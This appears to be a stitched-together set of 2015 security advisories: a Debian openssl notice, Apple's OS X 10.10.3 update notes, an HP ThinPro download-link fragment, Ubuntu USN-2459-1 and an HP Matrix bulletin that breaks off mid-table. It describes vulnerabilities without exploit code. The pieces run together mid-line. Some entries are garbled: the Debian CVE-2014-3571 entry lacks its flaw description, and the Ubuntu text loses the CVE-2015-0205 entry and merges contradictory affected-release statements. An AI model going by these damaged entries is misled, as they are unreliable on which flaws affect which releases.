security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nJanuary 11, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : openssl\nCVE ID : CVE-2014-3569 CVE-2014-3570 CVE-2014-3571 CVE-2014-3572 \n CVE-2014-8275 CVE-2015-0204 CVE-2015-0205 CVE-2015-0206\n\nMultiple vulnerabilities have been discovered in OpenSSL, a Secure\nSockets Layer toolkit. The Common Vulnerabilities and Exposures project\nidentifies the following issues:\n\nCVE-2014-3569\n\n Frank Schmirler reported that the ssl23_get_client_hello function in\n OpenSSL does not properly handle attempts to use unsupported\n protocols. When OpenSSL is built with the no-ssl3 option and a SSL\n v3 ClientHello is received, the ssl method would be set to NULL which\n could later result in a NULL pointer dereference and daemon crash. \n\nCVE-2014-3570\n\n Pieter Wuille of Blockstream reported that the bignum squaring\n (BN_sqr) may produce incorrect results on some platforms, which\n might make it easier for remote attackers to defeat cryptographic\n protection mechanisms. \n\nCVE-2014-3571\n\n Markus Stenberg of Cisco Systems, Inc. A remote attacker could use this flaw\n to mount a denial of service attack. \n\nCVE-2014-3572\n\n Karthikeyan Bhargavan of the PROSECCO team at INRIA reported that an\n OpenSSL client would accept a handshake using an ephemeral ECDH\n ciphersuite if the server key exchange message is omitted. This\n allows remote SSL servers to conduct ECDHE-to-ECDH downgrade attacks\n and trigger a loss of forward secrecy. \n\nCVE-2014-8275\n\n Antti Karjalainen and Tuomo Untinen of the Codenomicon CROSS project\n and Konrad Kraszewski of Google reported various certificate\n fingerprint issues, which allow remote attackers to defeat a\n fingerprint-based certificate-blacklist protection mechanism. \n\nCVE-2015-0204\n\n Karthikeyan Bhargavan of the PROSECCO team at INRIA reported that\n an OpenSSL client will accept the use of an ephemeral RSA key in a\n non-export RSA key exchange ciphersuite, violating the TLS\n standard. This allows remote SSL servers to downgrade the security\n of the session. \n\nCVE-2015-0205\n\n Karthikeyan Bhargavan of the PROSECCO team at INRIA reported that an\n OpenSSL server will accept a DH certificate for client\n authentication without the certificate verify message. This flaw\n effectively allows a client to authenticate without the use of a\n private key via crafted TLS handshake protocol traffic to a server\n that recognizes a certification authority with DH support. \n\nCVE-2015-0206\n\n Chris Mueller discovered a memory leak in the dtls1_buffer_record\n function. A remote attacker could exploit this flaw to mount a\n denial of service through memory exhaustion by repeatedly sending\n specially crafted DTLS records. \n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.0.1e-2+deb7u14. \n\nFor the upcoming stable distribution (jessie), these problems will be\nfixed soon. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.0.1k-1. \n\nWe recommend that you upgrade your openssl packages. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nAPPLE-SA-2015-04-08-2 OS X 10.10.3 and Security Update 2015-004\n\nOS X Yosemite 10.10.3 and Security Update 2015-004 are now available\nand address the following:\n\nAdmin Framework\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: A process may gain admin privileges without properly\nauthenticating\nDescription: An issue existed when checking XPC entitlements. This\nissue was addressed with improved entitlement checking. \nCVE-ID\nCVE-2015-1130 : Emil Kvarnhammar at TrueSec\n\napache\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: Multiple vulnerabilities in Apache\nDescription: Multiple vulnerabilities existed in Apache versions\nprior to 2.4.10 and 2.2.29, including one that may allow a remote\nattacker to execute arbitrary code. These issues were addressed by\nupdating Apache to versions 2.4.10 and 2.2.29\nCVE-ID\nCVE-2013-0118\nCVE-2013-5704\nCVE-2013-6438\nCVE-2014-0098\nCVE-2014-0117\nCVE-2014-0118\nCVE-2014-0226\nCVE-2014-0231\nCVE-2014-3523\n\nATS\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: Multiple input validation issues existed in fontd. \nThese issues were addressed through improved input validation. \nCVE-ID\nCVE-2015-1131 : Ian Beer of Google Project Zero\nCVE-2015-1132 : Ian Beer of Google Project Zero\nCVE-2015-1133 : Ian Beer of Google Project Zero\nCVE-2015-1134 : Ian Beer of Google Project Zero\nCVE-2015-1135 : Ian Beer of Google Project Zero\n\nCertificate Trust Policy\nImpact: Update to the certificate trust policy\nDescription: The certificate trust policy was updated. The complete\nlist of certificates may be viewed at https://support.apple.com/en-\nus/HT202858. \n\nCFNetwork HTTPProtocol\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: Cookies belonging to one origin may be sent to another\norigin\nDescription: A cross-domain cookie issue existed in redirect\nhandling. Cookies set in a redirect response could be passed on to a\nredirect target belonging to another origin. The issue was address\nthrough improved handling of redirects. \nCVE-ID\nCVE-2015-1089 : Niklas Keller\n\nCFNetwork Session\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: Authentication credentials may be sent to a server on\nanother origin\nDescription: A cross-domain HTTP request headers issue existed in\nredirect handling. HTTP request headers sent in a redirect response\ncould be passed on to another origin. The issue was addressed through\nimproved handling of redirects. \nCVE-ID\nCVE-2015-1091 : Diego Torres (http://dtorres.me)\n\nCFURL\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: Visiting a maliciously crafted website may lead to arbitrary\ncode execution\nDescription: An input validation issue existed within URL\nprocessing. This issue was addressed through improved URL validation. \nCVE-ID\nCVE-2015-1088 : Luigi Galli\n\nCoreAnimation\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: Visiting a maliciously crafted website may lead to arbitrary\ncode execution\nDescription: A use-after-free issue existed in CoreAnimation. This\nissue was addressed through improved mutex management. \nCVE-ID\nCVE-2015-1136 : Apple\n\nFontParser\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nprocessing of font files. These issues were addressed through\nimproved bounds checking. \nCVE-ID\nCVE-2015-1093 : Marc Schoenefeld\n\nGraphics Driver\nAvailable for: OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: A NULL pointer dereference existed in NVIDIA graphics\ndriver\u0027s handling of certain IOService userclient types. This issue\nwas addressed through additional context validation. \nCVE-ID\nCVE-2015-1137 :\nFrank Graziano and John Villamil of the Yahoo Pentest Team\n\nHypervisor\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: A local application may be able to cause a denial of service\nDescription: An input validation issue existed in the hypervisor\nframework. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2015-1138 : Izik Eidus and Alex Fishman\n\nImageIO\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: Processing a maliciously crafted .sgi file may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the handling of\n.sgi files. This issue was addressed through improved bounds\nchecking. \nCVE-ID\nCVE-2015-1139 : Apple\n\nIOHIDFamily\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: A malicious HID device may be able to cause arbitrary code\nexecution\nDescription: A memory corruption issue existed in an IOHIDFamily\nAPI. This issue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-1095 : Andrew Church\n\nIOHIDFamily\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: A buffer overflow issue existed in IOHIDFamily. This\nissue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-1140 : lokihardt@ASRT working with HP\u0027s Zero Day Initiative,\nLuca Todesco\n\nIOHIDFamily\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: A local user may be able to determine kernel memory layout\nDescription: An issue existed in IOHIDFamily that led to the\ndisclosure of kernel memory content. This issue was addressed through\nimproved bounds checking. \nCVE-ID\nCVE-2015-1096 : Ilja van Sprundel of IOActive\n\nIOHIDFamily\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A heap buffer overflow existed in IOHIDFamily\u0027s\nhandling of key-mapping properties. This issue was addressed through\nimproved bounds checking. \nCVE-ID\nCVE-2014-4404 : Ian Beer of Google Project Zero\n\nIOHIDFamily\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A null pointer dereference existed in IOHIDFamily\u0027s\nhandling of key-mapping properties. This issue was addressed through\nimproved validation of IOHIDFamily key-mapping properties. \nCVE-ID\nCVE-2014-4405 : Ian Beer of Google Project Zero\n\nIOHIDFamily\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5\nImpact: A user may be able to execute arbitrary code with system\nprivileges\nDescription: An out-of-bounds write issue exited in the IOHIDFamily\ndriver. The issue was addressed through improved input validation. \nCVE-ID\nCVE-2014-4380 : cunzhang from Adlab of Venustech\n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: A local user may be able to cause unexpected system shutdown\nDescription: An issue existed in the handling of virtual memory\noperations within the kernel. The issue is fixed through improved\nhandling of the mach_vm_read operation. \nCVE-ID\nCVE-2015-1141 : Ole Andre Vadla Ravnas of www.frida.re\n\nKernel\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: A local user may be able to cause a system denial of service\nDescription: A race condition existed in the kernel\u0027s setreuid\nsystem call. This issue was addressed through improved state\nmanagement. \nCVE-ID\nCVE-2015-1099 : Mark Mentovai of Google Inc. \n\nKernel\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: A local application may escalate privileges using a\ncompromised service intended to run with reduced privileges\nDescription: setreuid and setregid system calls failed to drop\nprivileges permanently. This issue was addressed by correctly\ndropping privileges. \nCVE-ID\nCVE-2015-1117 : Mark Mentovai of Google Inc. \n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: An attacker with a privileged network position may be able\nto redirect user traffic to arbitrary hosts\nDescription: ICMP redirects were enabled by default on OS X. This\nissue was addressed by disabling ICMP redirects. \nCVE-ID\nCVE-2015-1103 : Zimperium Mobile Security Labs\n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: An attacker with a privileged network position may be able\nto cause a denial of service\nDescription: A state inconsistency existed in the processing of TCP\nheaders. This issue was addressed through improved state handling. \nCVE-ID\nCVE-2015-1102 : Andrey Khudyakov and Maxim Zhuravlev of Kaspersky Lab\n\nKernel\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: A local user may be able to cause unexpected system\ntermination or read kernel memory\nDescription: A out of bounds memory access issue existed in the\nkernel. This issue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-1100 : Maxime Villard of m00nbsd\n\nKernel\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: A remote attacker may be able to bypass network filters\nDescription: The system would treat some IPv6 packets from remote\nnetwork interfaces as local packets. The issue was addressed by\nrejecting these packets. \nCVE-ID\nCVE-2015-1104 : Stephen Roettger of the Google Security Team\n\nKernel\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the kernel. This\nissue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-1101 : lokihardt@ASRT working with HP\u0027s Zero Day Initiative\n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: A remote attacker may be able to cause a denial of service\nDescription: A state inconsistency issue existed in the handling of\nTCP out of band data. This issue was addressed through improved state\nmanagement. \nCVE-ID\nCVE-2015-1105 : Kenton Varda of Sandstorm.io\n\nLaunchServices\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: A local user may be able to cause the Finder to crash\nDescription: An input validation issue existed in LaunchServices\u0027s\nhandling of application localization data. This issue was addressed\nthrough improved validation of localization data. \nCVE-ID\nCVE-2015-1142\n\nLaunchServices\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: A type confusion issue existed in LaunchServices\u0027s\nhandling of localized strings. This issue was addressed through\nadditional bounds checking. \nCVE-ID\nCVE-2015-1143 : Apple\n\nlibnetcore\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: Processing a maliciously crafted configuration profile may\nlead to unexpected application termination\nDescription: A memory corruption issue existed in the handling of\nconfiguration profiles. This issue was addressed through improved\nbounds checking. \nCVE-ID\nCVE-2015-1118 : Zhaofeng Chen, Hui Xue, Yulong Zhang, and Tao Wei of\nFireEye, Inc. \n\nntp\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: A remote attacker may brute force ntpd authentication keys\nDescription: The config_auth function in ntpd generated a weak key\nwhen an authentication key was not configured. This issue was\naddressed by improved key generation. \nCVE-ID\nCVE-2014-9298\n\nOpenLDAP\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: A remote unauthenticated client may be able to cause a\ndenial of service\nDescription: Multiple input validation issues existed in OpenLDAP. \nThese issues were addressed by improved input validation. \nCVE-ID\nCVE-2015-1545 : Ryan Tandy\nCVE-2015-1546 : Ryan Tandy\n\nOpenSSL\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: Multiple vulnerabilities in OpenSSL\nDescription: Multiple vulnerabilities existed in OpenSSL 0.9.8zc,\nincluding one that may allow an attacker to intercept connections to\na server that supports export-grade ciphers. These issues were\naddressed by updating OpenSSL to version 0.9.8zd. \nCVE-ID\nCVE-2014-3569\nCVE-2014-3570\nCVE-2014-3571\nCVE-2014-3572\nCVE-2014-8275\nCVE-2015-0204\n\nOpen Directory Client\nAvailable for: OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: A password might be sent unencrypted over the network when\nusing Open Directory from OS X Server\nDescription: If an Open Directory client was bound to an OS X Server\nbut did not install the certificates of the OS X Server, and then a\nuser on that client changed their password, the password change\nrequest was sent over the network without encryption. This issue was\naddressed by having the client require encryption for this case. \nCVE-ID\nCVE-2015-1147 : Apple\n\nPHP\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: Multiple vulnerabilities in PHP\nDescription: Multiple vulnerabilities existed in PHP versions prior\nto 5.3.29, 5.4.38, and 5.5.20, including one which may have led to\narbitrary code execution. This update addresses the issues by\nupdating PHP to versions 5.3.29, 5.4.38, and 5.5.20. \nCVE-ID\nCVE-2013-6712\nCVE-2014-0207\nCVE-2014-0237\nCVE-2014-0238\nCVE-2014-2497\nCVE-2014-3478\nCVE-2014-3479\nCVE-2014-3480\nCVE-2014-3487\nCVE-2014-3538\nCVE-2014-3587\nCVE-2014-3597\nCVE-2014-3668\nCVE-2014-3669\nCVE-2014-3670\nCVE-2014-3710\nCVE-2014-3981\nCVE-2014-4049\nCVE-2014-4670\nCVE-2014-4698\nCVE-2014-5120\n\nQuickLook\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: Opening a maliciously crafted iWork file may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the handling of\niWork files. This issue was addressed through improved memory\nhandling. \nCVE-ID\nCVE-2015-1098 : Christopher Hickstein\n\nSceneKit\nAvailable for: OS X Mountain Lion v10.8.5\nImpact: Viewing a maliciously crafted Collada file may lead to\narbitrary code execution\nDescription: A heap buffer overflow existed in SceneKit\u0027s handling\nof Collada files. Viewing a maliciously crafted Collada file may have\nled to arbitrary code execution. This issue was addressed through\nimproved validation of accessor elements. \nCVE-ID\nCVE-2014-8830 : Jose Duart of Google Security Team\n\nScreen Sharing\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: A user\u0027s password may be logged to a local file\nDescription: In some circumstances, Screen Sharing may log a user\u0027s\npassword that is not readable by other users on the system. This\nissue was addressed by removing logging of credential. \nCVE-ID\nCVE-2015-1148 : Apple\n\nSecurity - Code Signing\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: Tampered applications may not be prevented from launching\nDescription: Applications containing specially crafted bundles may\nhave been able to launch without a completely valid signature. This\nissue was addressed by adding additional checks. \nCVE-ID\nCVE-2015-1145\nCVE-2015-1146\n\nUniformTypeIdentifiers\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: A buffer overflow existed in the way Uniform Type\nIdentifiers were handled. This issue was addressed with improved\nbounds checking. \nCVE-ID\nCVE-2015-1144 : Apple\n\nWebKit\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: Visiting a maliciously crafted website may lead to arbitrary\ncode execution\nDescription: A memory corruption issue existed in WebKit. This\nissues was addressed through improved memory handling. \nCVE-ID\nCVE-2015-1069 : lokihardt@ASRT working with HP\u0027s Zero Day Initiative\n\nSecurity Update 2015-004 (available for OS X Mountain Lion v10.8.5\nand OS X Mavericks v10.9.5) also addresses an issue caused by the fix\nfor CVE-2015-1067 in Security Update 2015-002. This issue prevented\nRemote Apple Events clients on any version from connecting to the\nRemote Apple Events server. In default configurations, Remote Apple\nEvents is not enabled. \n\nOS X Yosemite 10.10.3 includes the security content of Safari 8.0.5. \nhttps://support.apple.com/en-us/HT204658\n\nOS X Yosemite 10.10.3 and Security Update 2015-004 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: http://support.apple.com/kb/HT1222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG/MacGPG2 v2.0.22 (Darwin)\nComment: GPGTools - http://gpgtools.org\n\niQIcBAEBAgAGBQJVJKj2AAoJEBcWfLTuOo7tDh4QAK0LxfwMRKcdOXOKpXsRz6lg\nlhZ+CLVcSepq8qBkFQ74f3B5CuhxD0IGQPaAuSXl51tWYdfN+92tkbmyZ9k8901l\n+I0vw6upeE+oqRnGtSRzq68UhcARbdV8V1+C0Xl3IIuuHc+xlEgvklDhF9Pc8XM6\nDudGiVNqt6MOqd5Oc4s4FFF0nnpnyG9+UJem3mi4Ee88PwI4x1Hev7utPPmaPDzj\ncjkVeislko3QArNJxtBpkYudErA4eR5OX8Tdf12jAmPTtjrXUb3VigEf78Nna0RW\nkHTOGdB5EZ+YFZ8KlyIQlENBjTtI8CGdCF4/S/2xDN83NTRsimd5Y7LSjdd0uANo\npqxAc3Gzn5xngWF1Qbb6V+XZBfz5NoeTq5BXBB5OHz4PSGaQuMsBA2RYFMzNLqWv\nD/T5U1JtzRLALt0lYAz63B0OhW7KXeLI9oer1Vo4wWF9O9cUFyuSI4JU5uYLQpJX\nkEpSFt4YPFFxMnlzCLzLkmVGax4w9M/tRHYeSKAnRlnsoPBtIGFItlNZE2RduD/R\n5n2APoJa3banQ8miycGORYP3WsktDRZzBy+2QPWuz8sE3AvAkO9xWp8PrQBkqf/b\n6CIG5UkCYITG2uzBXqnGbfDiEDvBLNN1Yq0ZZI23iYRxrdW0I0pv1CHio354q12G\nvVE37tYUU4PnLfwlcazq\n=MOsT\n-----END PGP SIGNATURE-----\n. \n\nSoftpaq:\nhttp://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe\n\nEasy Update Via ThinPro / EasyUpdate (x86):\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-\n4.1-4.3-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-\n4.1-4.3-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-\n4.1-4.3-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all-\n4.4-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all-\n5.0-5.1-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all-\n5.0-5.1-x86.xar\n\nVia ThinPro / EasyUpdate (ARM):\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-\n4.1-4.3-armel.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-\n4.1-4.3-armel.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-\n4.1-4.3-armel.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all-\n4.4-armel.xar\n\nNote: Known issue on security-sp-2.0-all-4.1-4.3-arm.xar: With the patch\napplied, VMware cannot connect if security level is set to \"Refuse insecure\nconnections\". Updating VMware to the latest package on ftp.hp.com will solve\nthe problem. ============================================================================\nUbuntu Security Notice USN-2459-1\nJanuary 12, 2015\n\nopenssl vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.10\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenSSL. \n\nSoftware Description:\n- openssl: Secure Socket Layer (SSL) cryptographic library and tools\n\nDetails:\n\nPieter Wuille discovered that OpenSSL incorrectly handled Bignum squaring. \n(CVE-2014-3570)\n\nMarkus Stenberg discovered that OpenSSL incorrectly handled certain crafted\nDTLS messages. (CVE-2014-3571)\n\nKarthikeyan Bhargavan discovered that OpenSSL incorrectly handled certain\nhandshakes. (CVE-2014-3572)\n\nAntti Karjalainen, Tuomo Untinen and Konrad Kraszewski discovered that\nOpenSSL incorrectly handled certain certificate fingerprints. A remote\nattacker could possibly use this issue to trick certain applications that\nrely on the uniqueness of fingerprints. (CVE-2014-8275)\n\nKarthikeyan Bhargavan discovered that OpenSSL incorrectly handled certain\nkey exchanges. (CVE-2015-0204)\n\nKarthikeyan Bhargavan discovered that OpenSSL incorrectly handled client\nauthentication. \nThis issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. This issue\nonly affected Ubuntu 12.04 LTS, Ubuntu 14.04 LTS and Ubuntu 14.10. \n(CVE-2015-0206)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.10:\n libssl1.0.0 1.0.1f-1ubuntu9.1\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.8\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.21\n\nUbuntu 10.04 LTS:\n libssl0.9.8 0.9.8k-7ubuntu8.23\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nReferences:\n http://www.ubuntu.com/usn/usn-2459-1\n CVE-2014-3570, CVE-2014-3571, CVE-2014-3572, CVE-2014-8275,\n CVE-2015-0204, CVE-2015-0205, CVE-2015-0206\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu9.1\n https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.8\n https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.21\n https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.23\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04774019\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04774019\nVersion: 1\n\nHPSBMU03409 rev.1 - HP Matrix Operating Environment, Multiple Vulnerabilities\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2015-08-24\nLast Updated: 2015-08-24\n\nPotential Security Impact: Remote unauthorized modification, unauthorized\naccess, or unauthorized disclosure of information. \n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP Matrix\nOperating Environment. The vulnerabilities could be exploited remotely\nresulting in unauthorized modification, unauthorized access, or unauthorized\ndisclosure of information. \n\nReferences:\n\nCVE-2010-5107\nCVE-2013-0248\nCVE-2014-0118\nCVE-2014-0226\nCVE-2014-0231\nCVE-2014-1692\nCVE-2014-3523\nCVE-2014-3569\nCVE-2014-3570\nCVE-2014-3571\nCVE-2014-3572\nCVE-2014-8142\nCVE-2014-8275\nCVE-2014-9427\nCVE-2014-9652\nCVE-2014-9653\nCVE-2014-9705\nCVE-2015-0204\nCVE-2015-0205\nCVE-2015-0206\nCVE-2015-0207\nCVE-2015-0208\nCVE-2015-0209\nCVE-2015-0231\nCVE-2015-0232\nCVE-2015-0273\nCVE-2015-0285\nCVE-2015-0286\nCVE-2015-0287\nCVE-2015-0288\nCVE-2015-0289\nCVE-2015-0290\nCVE-2015-0291\nCVE-2015-0292\nCVE-2015-0293\nCVE-2015-1787\nCVE-2015-1788\nCVE-2015-1789\nCVE-2015-1790\nCVE-2015-1791\nCVE-2015-1792\nCVE-2015-2134\nCVE-2015-2139\nCVE-2015-2140\nCVE-2015-2301\nCVE-2015-2331\nCVE-2015-2348\nCVE-2015-2787\nCVE-2015-3113\nCVE-2015-5122\nCVE-2015-5123\nCVE-2015-5402\nCVE-2015-5403\nCVE-2015-5404\nCVE-2015-5405\nCVE-2015-5427\nCVE-2015-5428\nCVE-2015-5429\nCVE-2015-5430\nCVE-2015-5431\nCVE-2015-5432\nCVE-2015-5433\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP Matrix Operating Environment impacted software components and versions:\n\nHP Systems Insight Manager (SIM) prior to version 7.5.0\nHP System Management Homepage (SMH) prior to version 7.5.0\nHP Version Control Agent (VCA) prior to version 7.5.0\nHP Version Control Repository Manager (VCRM) prior to version 7.5.0\nHP Insight Orchestration prior to version 7.5.0\nHP Virtual Connect Enterprise Manager (VCEM) prior to version 7.5.0\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2010-5107 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2013-0248 (AV:L/AC:M/Au:N/C:N/I:P/A:P) 3.3\nCVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-1692 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-3523 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-8142 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-9427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-9652 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-9653 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-9705 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0204 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2015-0205 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2015-0206 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0207 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0208 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2015-0209 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-0231 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0232 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-0273 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0285 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2015-0286 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0287 